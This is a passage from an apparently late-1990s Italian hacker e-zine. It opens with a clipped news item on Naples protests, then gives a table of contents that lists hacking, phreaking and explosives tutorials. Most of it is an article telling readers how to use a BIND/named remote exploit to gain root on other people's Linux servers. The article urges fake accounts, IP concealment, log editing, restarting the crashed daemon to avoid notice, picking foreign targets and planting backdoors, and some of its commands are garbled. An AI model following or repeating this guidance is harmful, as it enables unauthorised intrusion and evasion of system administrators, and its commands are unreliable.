rifiuti e organizzato blocchi stradali. I manifestanti paralizzano
tuttora l'incrocio tra via Medina e via Monteoliveto, nel centro
della citta', dove sono stati capovolti sulla carreggiata alcuni
cassonetti. Le forze dell'ordine sono intervenute per contenere gruppi
di disoccupati e Lsu che, giunti in piazza Matteotti, a pochi metri
dalla Questura, hanno cercato di entrare nel palazzo dove ha
sede la Provincia, lanciando anche pietre e oggetti. Alcuni
manifestanti hanno cominciato a dare fuoco ai cassonetti
presenti nella piazza, incendiando poi anche quelli delle strade
vicine. Un gruppo si e' quindi diretto verso il vicino incrocio
e lo ha bloccato con altri cassonetti. Le forze dell'ordine
presidiano con un cordone il palazzo della Provincia e al
momento tengono sotto controllo i manifestanti. Il corteo,
organizzato da Lsu e disoccupati del Movimento di lotta per il
lavoro (complessivamente circa 500 persone, alle quali si sono
uniti anche manifestanti provenienti da Acerra), era partito da
piazza del Gesu', nel centro storico, ed ha raggiunto, cosi' come
previsto, la sede dell'amministrazione provinciale.

---cYb0rG--- [Dgt_Brains]

_.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._
|_-_-_-_-_-_-_-_-!!!-=[ AnArChY|iN|tHe|SyStEm ]=-!!!-_-_-_-_-_-_-_-_|
|.-._.-._.-._.-._.-._.-._.uNiVeRsAl E-ZiNe-._.-._.-._.-._.-._.-._.-.|
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=+
|:.......................:InDeX_oF_cOnTeNtS:.......................:|
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=+
|/.\'/.\'/.\'/.\ArTiCoLo/.\'/.\'/./|\'/.\'/.\'/.\AuToRe/.\'/.\'/.\'\|
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
|<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<|
|>>>>>>>>>>>>>>>>>>>>>>>>>> -=| iNTr0 |=- >>>>>>>>>>>>>>>>>>>>>>>>>>|
|<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<|
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
|>-[ INTRO ]------<*>-------->0lDir0N61<-----------<|
|<-[ MANIFESTO ]------>*<------------------------------>|
|>-[ DISCLAIMER LEGALE ]------<*>------------------------------<|
|>-[ NEWZ ]------<*>-------->0lDir0N61<-----------<|
|>-[ LVOA AREA61 ]------<*>-------->0lDir0n61<-----------<|
|>-[ L'ALTRO CYBERPUNK ]------<*>-------->0lDir0N61<-----------<|
|>-[ GLI ALLEGATI ]------<*>------------------------------<|
|>-[ L.I.S.A ALTRA... ]------<*>-------->0lDir0n61<-----------<|
|>-[ IN DIRETTA DA DISINFO ]------<*>---------->Cyb0rG<------------<|
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
|<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<|
|>>>>>>>>>>>>>>>>>>>>>>>>> -=| hAcKiNg |=- >>>>>>>>>>>>>>>>>>>>>>>>>|
|<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<|
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
|>-[ BIND/NAMED EXPLOIT ]-------<*>---------->Vulcan<------------<|
|>-[ FAKE MAIL 4 NEWBIES ]-------<*>-------->The Jackal<----------<|
|>-[ PORTSURFING TUTORIAL ]-------<*>---------->Vulcan<------------<|
|>-[ TCP/IP 4 NEWBIES ]-------<*>-------->SONOunuomo<----------<|
|<-[ OCCULTAMENTO E... ]------->*<---------->aZAlIn<------------>|
|>-[ IP NUMBER SYSTEM ]-------<*>------->(SONOunuomo)<---------<|
|>-[ NETBUS + TELNET ]-------<*>----------->|M4X|<------------<|
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
|^] krIpt0 [^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^|
|>-[ L'ANGOLO DEL KRITTOGRAFO ]---<*>---------->0-z0nE<------------<|
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
|^] st0riEs [^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^|
|>-[ ITALIAN CRACKDOWN ]---<*>---------->cYb0rG<------------<|
|>-[ YAHOO RACCONTA L'ATTACCO ]---<*>-------->The Jackal<----------<|
|>-[ KRIMINI ONLINE ]---<*>--------->M4L3F1K0<-----------<|
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
|^] LiNuX [^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^|
|<-[ LA COMPILAZIONE DEL KERNEL ]->*<---------- >JacKal66<---------<|
|<-[ SETTARE IL KPP E... ]->*<---------- >Lord 'xYz<--------<|
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
|^] pR0gRamMinG [^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^|
|>-[ PASCAL TUTORIAL (a) pt.1 ]---<*>------->bugbyte/|ns4n3<-------<|
|>-[ PASCAL TUTORIAL (b) ]---<*>------------->ValK<-----------<|
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
|<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<|
|>>>>>>>>>>>>>>>>>>>>>>>> -=| cRaCkInG |=- >>>>>>>>>>>>>>>>>>>>>>>>>|
|<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<|
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
|<-[ SISTEMI DI NUMERAZIONE ]----->*<---------->QueQuero<---------->|
|<-[ NEOTRACE212 NAG_REMOVE ]----->*<------>Int19/Il.Socio<-------->|
|<-[ 3D STUDIO VIZ RELEASE3 ]----->*<---------->QueQuero<---------->|
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
|<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<|
|>>>>>>>>>>>>>>>>>>>>>>>> -=| pHreAkInG |=- >>>>>>>>>>>>>>>>>>>>>>>>|
|<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<|
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
|<-[ PROGETTO PSC ]------->*<------------->DieseL<--------->|
|<-[ LA FIAMMA OSSIDRIKA ]------->*<------------>sIcKb0y<--------->|
|<-[ BEIGE BOX ]------->*<----------->(gouranga)<------->|
|<-[ KOME TI COMBINO...2 ]------->*<------------>sAtAnEll0<------->|
|<-[ MINI LINEMAN HANDSET ]------->*<-------------->VELENO<-------->|
|<-[ SERRATURE CABINE ]------->*<-------------->C(h)e<--------->|
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
|^] cElLuLaRs [^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^|
|>-[ FUCK DA OMNITEL ]-------<*>------------->sp3nKy<---------<|
|<-[ SMS GRATIS update ]------->*<------------>0lDir0n61<------->|
|>-[ KAZZATE KE GIRANO... ]-------<*>------------->sp3nKy<---------<|
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
|<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<|
|>>>>>>>>>>>>>>>>>>>>>>>>>>> -=| iRc |=- >>>>>>>>>>>>>>>>>>>>>>>>>>>|
|<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<|
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
|<-[ IRC-WAR TUTORIAL ]----->*<------------>Lord 'xYz<------->|
|>-[ LISTA SOCKS & WINGATES ]-----<*>------------>SONOunuomo<------<|
|>-[ DAI SMURFIAMO INSIEME! ]----->*<--------------->ValK<---------<|
|>-[ GUIDA IRC ]----->*<------------>Killvearn<-------<|
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
|<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<|
|>>>>>>>>>>>>>>>>>>>>>>>>>> -=| vIriI |=- >>>>>>>>>>>>>>>>>>>>>>>>>>|
|<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<|
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
|<-[ VIRUS DEI COMPUTER ]--------->*<----------->0.z0ne<----------->|
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
|<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<|
|>>>>>>>>>>>>>>>>>>>>>>>>>> -=| tRikS |=- >>>>>>>>>>>>>>>>>>>>>>>>>>|
|<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<|
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
|<-[ FUN AT THE SCHOOL! ]------>*<------------->C(h)E<---------->|
|>-[ UOVA DI PASQUA DA AIS ]------<*>----------->tHe jAcKaL<-------<|
|<-[ CHI LOGGA SI DIVERTE ]------<*>------------>Gouranga<--------<|
|<-[ SATELLITE HACKING ]------>*<----------->MR^F0nZiE<-------->|
|<-[ MP3 TUTORIAL ]------>*<----------->mR_bIs0n<--------->|
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
|^] cD wRiTinG [^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^|
|>-[ INTRO ALLA MASTERIZZAZIONE ]-<*>--------------->AsaX<---------<|
|>-[ OVERBURNIG, CD PROTETTI... ]-<*>--------------->AsaX<---------<|
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
|^] hArDwArE [^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^|
|>-[ QUANDO IL MODEM... ]------<*>----------->tHe jAcKaL<-------<|
|>-[ OVERCLOCKING TUTORIAL ]------<*>--------------->AsaX<---------<|
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
|<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<|
|>>>>>>>>>>>>>>>>>>>>>>>> -=| g00dStuFf |=- >>>>>>>>>>>>>>>>>>>>>>>>|
|<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<|
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
|>-[ TATOO MACHINE ]--------------<*>------------>sP3nKy<----------<|
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
|^] dEsTr0Y! [^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^|
|>-[ DISCLAIMER ]-------<*>------------------------------<|
|<-[ STIMA DELLE DISTANZE ]------->*<----------->cYb0rG<----------->|
|<-[ SYRINGE GUN ]------->*<----------->cYb0rG<----------->|
|<-[ TNT TUTORIAL ]------->*<--------->(m4l3f1k0)<--------->|
|<-[ LANCIAFIAMME ]------->*<----------->cYb0rG<----------->|
|<-[ FUMOGENI E PETARDI ]------->*<----------->cYb0rG<----------->|
|<-[ XAR'S GUNPOWDER ]------->*<---------->XaRaBaS<----------->|
|<-[ ARCHITETTURA... ]------->*<----------->cYb0rG<----------->|
|<-[ BOOM RADIOCOMANDATI ]------->*<---------->LeoNEr0<----------->|
|<-[ LE MICCE ]------->*<----------->cYb0rG<----------->|
|<-[ 10 GRANDI MISCELE... ]------->*<--------->(m4l3f1k0)<--------->|
|<-[ I DETONATORI ]------->*<----------->cYb0rG<----------->|
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
|^] aNtI.c0p [^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^|
|>-[ ... DAL CODICE PENALE ]------<*>---------->cYb0rG<------------<|
|>-[ PIRATERIA: COPIARE... ]------<*>-------->Libertari ML<--------<|
|>-[ HOW TO BOYCOTT ]------<*>------->cYb0rG-OlDrake<-------<|
|>-[ MANUALE DI CONTRO... ]------<*>--------->Harry Caul<---------<|
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
|^] lEt'S tHinK aB0ut iT [^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^|
|>-[ UNA BREVISSIMA RIFLESSIONE ]-<*>----------->kAsPItA<----------<|
|>-[ DEAD BULK WALKING ]-<*>---------->0lDir0N61<---------<|
|>-[ KOSA NON FA UN VERO HACKER ]-<*>----------->BluEb0y<----------<|
|>-[ LETTERE DI UNA GIOVANE... ]-<*>------------->FuCk<-----------<|
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
|^] aLkOliKs! [^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^|
|<-[ ALKOL E KOKTAILS ]----------->*<------------->SiX<------------>|
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
|^] AsCiI Art [^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^|
|>-[ ASCII MADE IN AIS ]----------<*>---------->AiS-Squad<---------<|
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
|<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<|
|>>>>>>>>>>>>>>>>>>>>>>>>> -=| nArc0s |=- >>>>>>>>>>>>>>>>>>>>>>>>>>|
|<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<|
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
|<-[ CONSIGLI PER IL BUON... ]-->*<----------->0lDir0N61<-------->|
|<-[ CONCIMAZIONE DELLE PIANTE ]-->*<----------->0lDir0n61<-------->|
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
|^]-kitchen-[^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^|
|>-[ LE RICETTE DEL VECCHIO ]-----<*>----------->0lDir0N61<--------<|
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
|^] tRyiNg! [^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^|
|<-[ A MA',NEKKE' T'ARITROVI... ]->*<------------->sP3nKy<--------->|
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
|<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<|
|>>>>>>>>>>>>>>>>>>>>>>>>>> -=| rAdi0 |=- >>>>>>>>>>>>>>>>>>>>>>>>>>|
|<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<|
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
|^] 0ldir0n61's gReAt rAdi0 tUtoRiaL [^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^|
|<-[ INTRO ]-->*<----------->0lDir0N61<-------->|
|<-[ KONTENTS ]-->*<----------->0lDir0N61<-------->|
|<-[ BREAKING THE LAWS ]-->*<----------->0lDir0N61<-------->|
|<-[ FREQUENZE E MODULAZIONI ]-->*<----------->0lDir0N61<-------->|
|<-[ TX/RX IN ONDE ULTRA-CORTE ]-->*<----------->0lDir0N61<-------->|
|<-[ LE ANTENNE ]-->*<----------->0lDir0N61<-------->|
|<-[ LINKS ]-->*<----------->0lDir0N61<-------->|
|<-[ OUTRO ]-->*<----------->0lDir0N61<-------->|
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
|<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<|
|>>>>>>>>>>>>>>>>>>>>>> -=| Bi0-tEcHn0l0gY |=- >>>>>>>>>>>>>>>>>>>>>|
|<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<|
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
|<-[ LE BIOTECNOLOGIE ]----------->*<------------>sTaRtEr<--------->|
|<-[ LA CLONAZIONE ]----------->*<------------>sTaRtEr<--------->|
|>-[ ULTIMOLOG ]-----------<*>------------->Away<-----------<|
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
|<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<|
|>>>>>>>>>>>>>>>>>>>>>>>>>>> -=|0uTr0 |=- >>>>>>>>>>>>>>>>>>>>>>>>>>|
|<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<|
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
|<-[ HOTWEB ]--------------->*<------------->cYb0rG<--------->|
|<-[ LINKS ]--------------->*<------------------------------<|
|>-[ OUTRO ]---------------<*>----------->0lDir0N61<--------<|
|<-[ CONTACTS ]--------------->*<------------------------------>|
|>-[ LISTA E-MAIL ]---------------<*>------------------------------<|
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-.

._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-.

########################################################
####### H H AAA CCCC K KK III N N GGGG #######
####### H H A A C K K III NN N G #######
####### HHHHH AAAAA C KK III N N N G GG #######
####### H H A A C K K III N NN G G #######
####### H H A A CCCC K KK III N N GGGG #######
########################################################


!!!|-iL bind/named eXpl0iT-|!!!=-

Autore: Vulcan

...(¯`'·.¸(¯`'·.¸____________¸.·'´¯)¸.·'´¯)..
/ (¯`'·.¸(¯`'·.¸ **°°°°°°°°°** ¸.·'´¯)¸.·'´¯) \
/ @ ---==>>-----> _vulcan_ <----<<==--- @ \
\ (_¸.·'´(_¸.·'´ **°°°°°°°°°**`''·.¸_)`'·.¸_) /
\...(_¸.·'´(_¸.·'´¯¯¯¯¯¯¯¯¯¯¯¯`'·.¸_)`'·.¸_)../


OVVERO: come entrare lisci lisci nel maiframe della NASA. Ammesso che usino
linux !
NOTE: mettete la caffettiera sul fuoco..perchè dopo un paio d'ore sentirete
bussare la CIA o i marines..un buon caffè è sempre gradito.....hahaha

/°\°/°\°/°\°/°\°/°\°/°\°/°\

Di che vi parlo oggi? Di una cosa molto interessante, gli exploit da remoto
ed in particolare del bind/named exploit. Conto di trattare diversi tipi di
exploit su AiS, ma questo dipende da molti fattori, il mio tempo libero, i
nuovi exploit che escono, e anche le mie conoscenze e poi ci sono vari
siti che parlano degli exploit e non potete sempre avere la pappa pronta.
Comunque spero nelle prossime uscite di fornirvi idee e metodi per sfruttare
altri "remote exploit".
Bene adesso s'inizia. Ricordate che l'hacking è una passione, una sorta di
dedizione e studio contemporaneamente, per cui il presente testo deve essere
interpretato come uno stimolo a migliorarvi. Quindi, trovatevi un po di
tempo e cercatevi che significa buffer overflow, cercate di capire come
funziona il named, cercete di interpretate codice c, cercate altri exploit
da remoto. Studiate insomma, io non posso scrivere un enciclopedia (anche
perché non ne sarei capace.)
Piccola premessa giuridico/legale; usando questo articolo tu ti rendi conto
che le informazioni e gli esempi in esso contenuti, sono da intendersi
solo per scopi educativi, e qualunque uso ne venga fatto contrario a questi
scopi, va imputato alla responsabilità del lettore. Inoltre puoi diffondere
liberamente l'articolo purchè lasci invariato il nome del suo autore(e che
cazzo). Se nell'articolo riscontrerete qualke stronzata siete in oltre
pregati di correggermi scrivendomi una email a vulcan12mm@hotmail.com.
Un'altra cosa, io non vi conosco e voi non mi avete mai visto. Se avete visto
un cane io sono un gatto, se avete visto un gatto io sono un topo, se avete
visto un topo ..... e così via.....fino ad arrivare ai batteri monocellulari.
Passiamo all'articolo. Un exploit si dice remoto quando tramite esso un
hacker riesce ad avere il l'accesso ed il controllo di una macchina senza
essere in possesso di nessuna shell o account sulla stessa. Se non sapete
cosa sia una shell o un account allora datevi fuoco con 10000 lire di benzina.
Quando invece ottieni privilegi di root su una macchina avendo un account
ed una shell su di essa allora l'exploit si dice locale.
Bene dopo questa breve premessa di metodo(minchia ma sono troppo figo nel
linguaggio) passiamo a vedere uno degli exploit da remoto che più mi
piacciono, hehehe sapete mi ha dato parecchie soddisfazioni. Parliamo cioè
del "bind/named exploit".
Questo particolare exploit agisce sul named cioè un programmillo delle
macchine Linux che assieme al bind serve alla gestione di un dominio dns,
questo programma contiene un bug che lo rende exploitabile da remoto.
Quello che il named fa non è particolarmente importante per i nostri scopi,
(se proprio lo volete saperlo inviatemi una email e comunque vi ho detto che
dovrete studiarvelo) a voi basti sapere che di solito si trova nella dyrectory
usr/sbin/ di tutte le macchine linux. Pertanto tutte sono potenzialmente
exploitabili. Benone siete caldi? Siete pronti? Comiciate a dare una
rispolverata al vostro pinguino, perché adesso lo mettiamo a dura prova.
Perché abbiamo detto "potenzialmente exploitabili"? perche non tutte le
versioni del bind sono exploitabili ma solo quelle versioni sino alla 4.9.6
e quelle basate sulla 8.1.1, anche se ora mi sembra sia uscito anche
l'exploit per la 8.2.2 non ricordo bene.
Cosa fa questo benedetto exploit? Sfrutta semplicemente un buffer overflow
che fa andare in tilt il named cioè lo crasha e vi consente di entrare sulla
macchina con privilegi di root. Il tutto avviene sfruttando un valore di
offset ed uno di allign.
Potrebbe sembrare molto complesso ma non lo è anche perché esiste un altro
programma (ve lo allego sempre nella ezine) che si chiama bindinfo.c questo
ti da informazioni sulla exploitabilità del bind di una macchina e sui
parametri da settare. Ricordatevi: tutte le versioni 4.9.5 e 4.9.6 ed anche
le versioni 8.1.1. Comunque non dimenticate mai che l'importante è provare e
riprovare. Non usate semplicemente il codice c, cercate di interpretarlo,
e per usare l'exploit dovete comunque essere abbastanza esperti.
Bene l'exploit si compone di due parti:

- BIND INFO
- BIND EXPLOIT

La prima ci darà delle informazioni sul bind della macchina remota,
verificheremo perciò se è exploitabile e l'altra sarà l'exploit vero e
proprio, che ci darà accesso da root alla macchina senza decrittare passwd
file o shadow file. Fantastico no? E allora non vi lamentate perche forse
nessuna ezine vi da delle precise spiegazioni sugli exploit e su come usarli.
AVVERTIMENTO: non usate assolutamente l'exploit se non siete in grado di
dissimularvi sul sistema remoto e di editare i files di log. Ricordate
infatti che avrete l'accesso a root immediatamente per cui da subito dovete
sapere come muovervi.
Comunque io non mi ritengo responsabile lo ripeto. Se fate cazzate è solo
colpa vostra. Se non siete sicuri di quello che state facendo provate prima
a capire cosa sia il named sulla vostra macchina. Ve lo ripeto
/usr/sbin/named è un eseguibile. Il file di configurazione del named è
situato invece in /etc/named.conf e contiene tutte le informazioni a cui
accede il bind per la gestione di un dominio.
Se non avete capito passate oltre, perché non posso spiegarvelo sarebbe
troppo lungo, e poi per usare l'exploit non serve.
Anche se vi esorto ancora a cercare materiale sull'argomento per sapere
almeno di cosa stiamo parlando.

Vediamo cosa ci serve:
- vi serve un account falso (farselo è facile, provate con jumpy.it ad
esempio)
- dovete conoscere le tecniche di dissimulazione (ricordate che se lasciate
l'ip sulla macchina vittima vi beccano subito = viene la polizia a casa =
sequestro del PC + processo = fottuti!!)
- dovete sapere editare i files di log (di questo ne parliamo magari
sui prossimi numeri)
- linux (è obbligatorio dobbiamo compilare infatti bindinfo.c e named.c ci
serve un compilatore c del tutto simile a quello della macchina che
attaccheremo)
- un poco di culo nel beccare un server con il named exploitabile

Ok abbiamo tutto? SI? Bene, i sorgenti dell'exploit li trovate negli allegati
alla ezine e si tratta di:

- Bindinfo.c
- Namedexploit.c
- Bind4_9_5.c
- Bind4_9_6.c

Compilatevi prima bindinfo.c con il comando: (insomma vi devo dire tutto?)

gcc -o bindinfo.c binndinfo

Fatto? Ora avviate con /dir/incui/siete/bindinfo e lui vi richiederà un host.
Date il nome del server linux che volete venga controllato e il programmino
vi dirà la versione del bind oppure vi dirà che non è determinabile se la
versione è diversa. Se la versione è exploitabile bene. Utilizzate a seconda
della versione uno degli exploit che abbiamo visto sopra. Di questi
Namedexploit è il piu completo: se lo avviate senza parametri vi da infatti
una visione completa delle varie versioni del bind exploitabili....e della
configurazione dei parametri, offset compreso.
Lo sapevo che l'offset vi avrebbe preoccupato. Vi do una breve spiegazione
detto in parole molto ma molto povere si tratta di un valore che permette al
programma di settare i parametri da passare al buffer da exploitare.
Per cui buon hackeraggio...aaaahh dimenticavo dal momento che entrate da root
ricordate che il named è down....cioè lo abbiamo crashato pertanto bisogna
riavviarlo una volta dentro o l'amministratore di sistema se ne accorge.
Come riavviarlo....semplice dalla shell digitate....

Cd /etc/sbin/
./named

In pratica rieseguite il named. Ed il gioco è fatto. Ora e come se non fosse
mai stato crashato. (quasi! hihihi)
Bene i files, tutti rigorosamente in formato c li trovate allegati alla ezine.
Ok ragazzi, studiate e ricordate che esistono altri axploit per il named basta
cercare su:

- www.anticode.com
- www.rootshell.com

sopratutto su anticode c'è un'intera area dedicata. Leggetevi anche i testi.
Ah le solite raccomandazioni, il server da attacare cercatevelo straniero,
evitate tutti i .gov e .mil: sono pericolosissimi, ricordatevi che il tutto
funziona solo su macchine linux, quando siete dentro ripulite i file di log
e lasciate la vostra bella backdoor dove volete. (Uff tutto di un fiato....)
Un salutino dal vostro vulcan e non fatevi beccare.....
Se avete problemi o volete comunicarmi qualche cosa di errato che ho detto
mandate una email.

PS (se vi beccano non mandatemi nessuna email) hihihi

---_vulcan_---


-=!!!|-fAkE mAiL 4 nEwBieS-|!!!=-

Autore: The Jackal

--->Intro<---

